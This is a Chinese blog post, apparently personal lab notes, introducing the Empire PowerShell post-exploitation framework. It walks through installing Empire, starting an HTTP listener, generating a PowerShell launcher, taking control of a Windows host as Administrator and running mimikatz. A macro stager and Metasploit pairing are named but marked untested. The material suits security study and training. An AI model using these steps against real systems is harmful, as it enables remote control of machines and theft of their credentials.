PowerShell工具之Empire介绍

  • by

真的有效率和运气之说

昨晚就可以做出来的,硬是对着几篇网上文章发呆,运气是半天也没有想到http监听端口个人测试必须是80,个人监听其他的端口,比如8100,Empire工具list命令查看还是显示的80端口,本地看了8100又是在监听状态

一.安装
二.本地简单反弹shell使用
三.宏反弹使用(未本地测试)
四.msf、Empire联动使用(未本地测试)

参考:

https://blog.csdn.net/weixin_33688840/article/details/94275885 ***
https://cloud.tencent.com/developer/article/1097791
http://www.myh0st.cn/index.php/archives/193/
https://www.anquanke.com/post/id/87328
https://xz.aliyun.com/t/67

https://klionsec.github.io/2016/10/06/empire-powershell/ 内有一些ps1脚本介绍
https://zhuanlan.zhihu.com/p/26937026 实例
https://www.freebuf.com/articles/web/165925.html 详解
https://www.anquanke.com/post/id/87328
https://xz.aliyun.com/t/4159
https://www.jianshu.com/p/c5153ee1eb76
https://www.chainnews.com/articles/379463175693.htm

一.安装

git clone https://github.com/EmpireProject/Empire.git
cd /Empire/setup
./install.sh
./reset.sh 启动(出问题直接重启就行)
运行:./empire
可以看到它包含三个部分:
一个是modules即自身的一些模块
一个是listernes即监听,类似msf的exploit/multi/handler模块
一个是agents即已经链接上的会话,类似msf所存的session

二.本地简单反弹shell使用


(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name test
(Empire: listeners/http) > set Host http://192.168.132.131
(Empire: listeners/http) > set Port 8000
(Empire: listeners/http) > execute
[*] Starting listener 'test'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) > launcher powershell test



(Empire: listeners) > agents

[*] Active agents:

Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
ZRYKX53T ps 192.168.132.129 ROOT-PC *root-PC\Administrator powershell 1532 5/0.0 2019-09-01 12:30:16

(Empire: agents) > re
remove rename resource
(Empire: agents) > re
remove rename resource
(Empire: agents) > re
remove rename resource
(Empire: agents) > rename ZRYKX53T test128
(Empire: agents) > interact test128
(Empire: test128) >
agents download jobs lostlimit rename scriptimport spawn upload
back exit kill main resource searchmodule steal_token usemodule
bypassuac help killdate mimikatz revtoself shell sysinfo workinghours
clear info list psinject sc shinject updatecomms
creds injectshellcode listeners pth scriptcmd sleep updateprofile
(Empire: test128) > mimikatz 这个过程大概会等待10来秒才有结果

三.宏反弹使用(未本地测试)

(Empire: listeners) > usestager windows/macro


四.msf、Empire联动使用(未本地测试)

2019.9.1

发表评论

电子邮件地址不会被公开。 必填项已用*标注